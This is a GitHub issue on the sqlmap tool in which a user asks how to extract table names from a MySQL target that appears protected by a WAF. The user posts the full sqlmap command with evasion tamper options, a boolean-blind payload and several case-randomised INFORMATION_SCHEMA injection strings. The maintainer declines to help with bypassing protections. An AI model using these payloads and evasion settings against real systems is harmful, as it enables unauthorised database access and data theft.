### ISSUE TITLE
data extraction

### ISSUE THREAD

**Issue by RoyaSed** [sqlmapproject/sqlmap#4966]
**Describe the bug**
I can't get table name

my sqlmap command : sqlmap.py -r "C:\Users\LENOVO\Desktop\awdss.txt" --level 3 --risk 3 -v 3 -p "kod" --tamper=randomcase,xforwardedfor,informationschemacomment --dbs

injected payload : ' AND 4654=4654-- eBTX&pid=5

[PAYLOAD] AAVE' aNd orD(MiD((SeLECT IfNuLl(CaST(cOUnT(DIstInCt(schema_name)) aS nchAr),0x20) FrOm INFORMATION_SCHEMA/**/.SCHEMATA),1,1))>51-- MWUJ
 [PAYLOAD] AAVE' ANd ORd(mId((selECT iFNuLl(CAst(cOUnT(distinCT(schema_name)) As ncHAr),0x20) fROM INFORMATION_SCHEMA/**/.SCHEMATA),1,1))>48-- MWUJ
 [PAYLOAD] AAVE' aNd ORd(MId((SEleCT IfnULL(CaSt(coUNT(diStinCt(schema_name)) As NcHAR),0x20) froM INFORMATION_SCHEMA/**/.SCHEMATA),1,1))>9-- MWUJ
unable to retrieve the number of databases

managed to pull data with falling back -- this time i can't pull the table names

i tested them : informationschemacomment - no-cast - hex 

how can i solve this problem

banner :
 web server operating system: Linux
web application technology: PHP 5.4.45, Nginx, Plesk
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner: '5.7.36-0ubuntu0.18.04.1'

**Running environment:**
 - sqlmap version [e.g. 1.5.12.6#dev]
 - Installation method [zip]
 - Operating system: [Windows 10]
 - Python version [2.7.18]

**Target details:**
 - DBMS [MYSQL]
 - SQLi techniques found by sqlmap [Boolean Based Blind]
 - WAF/IPS [it could be]

**Comment by RoyaSed** [comment]
i used all mysql tamper, I tried with normal and no cast command
but no response from the target

**Comment by stamparm** [comment]
sorry man, but bypassing of protections is solely user's problem
